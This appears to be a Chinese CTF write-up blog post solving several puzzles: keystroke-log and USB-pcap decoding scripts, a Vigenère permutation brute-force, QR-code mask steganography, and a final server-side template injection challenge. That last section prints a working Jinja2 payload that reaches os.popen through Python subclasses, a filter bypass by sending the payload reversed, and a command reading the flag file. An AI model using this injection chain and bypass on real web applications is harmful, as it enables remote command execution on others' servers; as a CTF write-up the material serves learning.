本文最后更新于 857 天前,其中的信息可能已经有所发展或是发生改变。
import re
key_pattern = re.compile ('KeyDown "(.*?)"' )
with open ('secret.Q' , 'r' ) as r:
content = r.readlines()
a = []
for i in content:
b = re.findall(key_pattern, i)
if b:
a.append(b[0 ].lower())
print(a)
a = '' .join(a)
a = a.replace('shift' , '' ).replace("backspace" , '\b' ).replace('space' , ' ' ).replace('num ' , '' )
print(a)
if you want to decrypt the zip file.you need to get the key.i am a very good person.
so i will give you the key directly.the key is very easy.
as long as you get the key and you can see the files in the compressed zip
.fine1it’s time to give you the key.the key is 123456.
oh1sorry.this is the key of my bank card password.
the true key is 6e187bef.the key is 6e187bef.the key is 64187bef
if you want to decrypt the zip file.you need to geyt t the key.
i am a very good person.so i i will give you the key dirte ectly.
the key is very easy.
as long as you get the key and you can see the files in the compressed zu ip.
fine1it 's time to give you the key.the key is 123456 .oh1 sorr sorry.
this is the key of my vba banc k card password.
the ture t rue key is 6 e187 bef.
the key2 is 323 d1 a4 b 6 e187 bef.
the key3 is f 0 6 7 e c 9 4 64187 bef
得到明文攻击的三个密钥
6e187bef
323d1a4b
f067ec94
tshark -r keyboard.pcapng -T fields -e usbhid.data > usbdata.txt
得到的usb.txt中发现是4f,50,51,52,并不在一般的键盘按键范围,于是查找键盘按键https://max.book118.com/html/2017/0407/99227972.shtm
发现对应的是箭头
→↓←↓→ ↓→↑↓↓ ↓→↑↓↓ →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓↓ →↓↓ ↓↓ →↓↓ →↓↓ ↓↓ →↓←→↓← →↓←↓→↑←↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓ →↓↓↑←↑ →↓↓←↑↑ →↓←↓→ →↓↓←↑↑ ↓↓→↑← →←↓→↓← →↓↓←↑↑ ↓→↑↓↓ →↓←→↓← →←↓→↓← →↓←↓→↑←↑ →↓←↓→↑←↑ →←↓→↓← →←↓→↓← ↓↓ →↓←↓→ →↓←↓→↑←↑ →↓←→↓← →↓↓↑←↑ →↓↓↑←↑ →←↓→↓← ↓↓ ↓↓→↑← →↓←→↓← →↓↓←↑↑ →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓←↓→ ↓→↑↓↓ →↓←↓→↑←↑ ↓↓→↑← ↓↓ ↓↓→↑← →↓↓ →↓←↓→↑←↑ →↓↓↑←↑ ↓↓ →←↓→↓← →↓↓↑←↑ →↓↓↑←↑ →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓←↑↑ →↓↓ ↓→↑↓↓ →↓←→↓← →↓↓↑←↑ ↓↓→↑← ↓→↑↓↓ →↓←↓→↑←↑ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ →↓←→↓← ↓→↑↓↓ ↓↓→↑← →↓←→↓← ↓→↑↓↓ ↓↓ →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓←↓→ →↓←↓→↑←↑ →↓↓↑←↑ ↓→↑↓↓ →↓←↓→ →↓←↓→↑←↑ ↓↓→↑← →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓↓←↑↑ ↓↓→↑← ↓→↑↓↓ →↓↓←↑↑ ↓↓→↑← →↓←→↓← →↓↓
from PIL import Image
str = "4f5150514f00514f52515100514f525151004f50514f5150004f5151525052004f5150514f5250520051514f5250004f5151004f5151005151004f5151004f5151005151004f51504f5150004f5150514f5250520051514f5250004f5150514f525052004f5151004f5151525052004f5151505252004f5150514f004f51515052520051514f5250004f50514f5150004f515150525200514f525151004f51504f5150004f50514f5150004f5150514f525052004f5150514f525052004f50514f5150004f50514f5150005151004f5150514f004f5150514f525052004f51504f5150004f5151525052004f5151525052004f50514f51500051510051514f5250004f51504f5150004f5151505252004f5151525052004f5150514f5250520051514f5250004f5150514f00514f525151004f5150514f5250520051514f52500051510051514f5250004f5151004f5150514f525052004f5151525052005151004f50514f5150004f5151525052004f5151525052004f51515052520051514f5250004f5150514f525052004f5151505252004f515100514f525151004f51504f5150004f51515250520051514f525000514f525151004f5150514f525052004f5151505252004f51504f5150004f50514f5150004f5151525052004f5150514f525052004f51504f515000514f5251510051514f5250004f51504f515000514f525151005151004f5151505252004f5151004f5151505252004f51504f5150004f50514f5150004f51515052520051514f5250004f5150514f525052004f5150514f004f5150514f525052004f515152505200514f525151004f5150514f004f5150514f5250520051514f5250004f5151505252004f5151004f5151505252004f51515052520051514f525000514f525151004f51515052520051514f5250004f51504f5150004f515100"
img = Image.new('RGB', (len(str), len(str)))
i = 0
j = 5
print (len(str))
for n in range(len(str) // 2 -1 ):
print (str[n*2 :(n+1 )*2 ])
if str[n*2 :(n+1 )*2 ] == '4 f':
for k in range(6 ):
i += 1
img .putpixel((i, j), (255 , 255 ,255 ))
if str[n*2 :(n+1 )*2 ] == '51 ':
for k in range(6 ):
j += 1
img .putpixel((i, j), (255 , 255 , 255 ))
if str[n*2 :(n+1 )*2 ] == '50 ':
for k in range(6 ):
i -= 1
img .putpixel((i, j), (255 , 255 , 255 ))
if str[n*2 :(n+1 )*2 ] == '52 ':
for k in range(6 ):
j -= 1
img .putpixel((i, j), (255 , 255 , 255 ))
if str[n*2 :(n+1 )*2 ] == '00 ':
j = 5
i = i + 10
img .show()
2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
import binascii
from libnum import *
flag=2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
print (n2s(flag))
import libnum
f = open ("keyboard.pcapng" ,"rb" ).read()
pos = 1340
draws = ["622488" ,"22" ,"62426" ,"624624" ,"26822" ,"642624" ,"22684" ,"622" ,"62426848" ,"622848" ]
chars = ["0" ,"1" ,"2" ,"3" ,"4" ,"5" ,"6" ,"7" ,"8" ,"9" ]
c = ""
while (pos < len(f)):
data = f[pos+57 ]
if (data == 0x52 ):
c += "8"
elif(data == 0x51 ):
c += "2"
elif(data == 0x50 ):
c += "4"
elif(data == 0x4f ):
c += "6"
elif(data == 0 ):
c += " "
pos += 0x80
c = c .split (" " )[:-1 ]
ans = ""
for i in c :
ans += chars[draws.index(i)]
print (libnum.n2s(int(ans)))
b = []
a = ...
for i in a:
b.append(i)
c = []
for i in range (len (b)):
c.append(b[len (b) - i - 1 ])
with open ('a.txt' , 'w' ) as w:
w.write('' .join(c))
删去文件头前多余的00,得到正常文件
解压后发现是一个word,修改压缩包后缀,改为 .doc
打开,发现一首歌,搜索原歌词,比对内容将错误的单词缺少的字母提出来
hylqeygvs
根据题目的提示信息,需要爆破字母的排列顺序
官方 exp
from string import ascii_uppercase as uppercase
from itertools import cycle
import hashlib
table = dict ()
for ch in uppercase:
index = uppercase.index(ch)
table[ch] = uppercase[index:] + uppercase[:index]
deTable = {'A' : 'A' }
start = 'Z'
for ch in uppercase[1 :]:
index = uppercase.index(ch)
deTable[ch] = chr (ord (start) + 1 - index)
def deKey (key ):
return '' .join([deTable[i] for i in key])
def encrypt (plainText, key ):
result = []
currentKey = cycle(key)
for ch in plainText:
if 'A' <= ch <= 'Z' :
index = uppercase.index(ch)
ck = next (currentKey)
result.append(table[ck][index])
else :
result.append(ch)
return '' .join(result)
key = "TREX"
keys = deKey(key)
def Pailie (list1, start, end ):
if start == end:
q = "" .join(list1)
ans = encrypt(q, keys)
flag = hashlib.md5(ans.encode()).hexdigest()
if ("5613a" in flag[0 :5 ]):
print(flag)
else :
for i in range (start, end + 1 ):
list1[start], list1[i] = list1[i], list1[start]
Pailie(list1, start + 1 , end)
list1[start], list1[i] = list1[i], list1[start]
mw = ['H' , 'Y' , 'L' , 'E' , 'V' , 'S' , 'G' , 'Q' , 'Y' ]
Pailie(mw, 0 , len (mw) - 1 )
zip
附加一个rar
,把rar提取出来,得到自定义掩码的运算规则
mask0:(i+j) % 2
mask1:j % 2
mask2:i % 3
mask3:(i+j) % 3
mask4:(i//3+j//2)%2
mask5:(i*j)%3+(i*j)%2
mask6:((i*j)%3+i*j)%2
mask7:((i*j)%3+i+j)%2
mask8:(i*j) % 2
mask9:(i*j) % 3
mask10:(i^j) % 3
mask11:(i^j) % 2
mask12:(i//3+j//2)%3
mask13:(i^j)%3+(i^j)%2
mask14:((i^j)%3+i^j)%2
mask15:((i^j)%3+i+j)%2
这里就是重新定义的16种掩码,前8种是原始的掩码生成方式,只是换了一下顺序,所以去扫所有的二维码的时候,可能会发现有的二维码还是能直接扫出来,那就是在生成的时候随机刚好随机到了自己原来的源码
任意一个二维码的png
放入stegsolve
中,可以发现在r0的左上角有隐写痕迹
多看几张图,可以发现就只有前四格存在隐写,结合描述说掩码的识别特征不在二维码区域,所以可以知道这个4位的数据就是16种掩码的特征位…
应该是ssti,发现了一大堆过滤,发现它只会检测我们传过去的原生数据,不会检测那边反转好的字符串,如果我们传入反转后的即可绕过
output = '''{% print "".__class__.__bases__[0].__subclasses__()%}''' [::-1 ]
print(output)
发送反转后的payload
得到类列表,然后将返回的列表内容复制进脚本寻找可利用的类
import json
a = """
<class 'type'>...<class 'unicodedata.UCD'>
"""
num = 0
allList = []
result = ""
for i in a:
if i == ">" :
result += i
allList.append(result)
result = ""
elif i == "\n" or i == "," :
continue
else :
result += i
for k,v in enumerate (allList):
if "os._wrap_close" in v:
print(str (k)+"--->" +v)
{% print "".__class__ .__bases__ [0 ].__subclasses__ ()[132 ].__init__ .__globals__ ['popen' ]('ls' ).read()%}
}%)(daer.)'galf/ ln'(]'nepop'[__slabolg__ .__tini__ .]231[)(__sessalcbus__ .]0[__sesab__ .__ssalc__ ."" tnirp %{
这里过滤了很多读取文件的命令,可以利用nl的绕过过滤读取文件(后测试用grep和rev等命令也可以读取flag)